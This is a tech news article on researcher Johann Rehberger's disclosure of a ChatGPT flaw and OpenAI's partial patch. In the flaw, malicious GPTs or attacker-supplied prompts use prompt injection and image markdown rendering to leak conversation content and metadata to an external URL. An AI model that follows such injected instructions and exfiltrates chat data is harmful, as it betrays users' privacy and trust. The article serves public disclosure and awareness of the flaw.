A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.
When Johann Rehberger attempted to alert OpenAI to the potential flaw, he received no response, forcing the researcher to disclose details of the flaw publicly.
Following the disclosure OpenAI released safety checks for ChatGPT that mitigate the flaw, but not completely.
A hasty patch
The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, alongside metadata and technical data.
A secondary method involves the victim submitting a prompt supplied by the attacker, which then uses image markdown rendering and prompt injecting to exfiltrate the data.
Rehberger initially reported the flaw to OpenAI way back in April 2023, supplying more details on how it can be used in more devious ways through November.
Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."
Instead of further pursuing an apparently non-respondent OpenAI, Rehberger instead decided to go public with his discovery, releasing a video demonstration of how his entire conversation with a chatbot designed to play tic-tac-toe was extracted to a third-party URL.
To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix stating, “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”
Unfortunately, these new checks do not fully mitigate the flaw, as Rehberger discovered that arbitrary domains are still sometimes rendered by ChatGPT, but a successful return is hit and miss. While these checks have apparently been implemented on the desktop versions of ChatGPT, the flaw remains viable on the iOS mobile app.
More from TechRadar Pro
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
Benedict Collins is a Staff Writer at TechRadar Pro covering privacy and security. Before settling into journalism he worked as a Livestream Production Manager, covering games in the National Ice Hockey League for 5 years and contributing heavily to the advancement of livestreaming within the league. Benedict is mainly focused on security issues such as phishing, malware, and cyber criminal activity, but he also likes to draw on his knowledge of geopolitics and international relations to understand the motives and consequences of state-sponsored cyber attacks.
He has a MA in Security, Intelligence and Diplomacy, alongside a BA in Politics with Journalism, both from the University of Buckingham. His masters dissertation, titled 'Arms sales as a foreign policy tool,' argues that the export of weapon systems has been an integral part of the diplomatic toolkit used by the US, Russia and China since 1945. Benedict has also written about NATO's role in the era of hybrid warfare, the influence of interest groups on US foreign policy, and how reputational insecurity can contribute to the misuse of intelligence.
Outside of work Ben follows many sports; most notably ice hockey and rugby. When not running or climbing, Ben can most often be found deep in the shrubbery of a pub garden.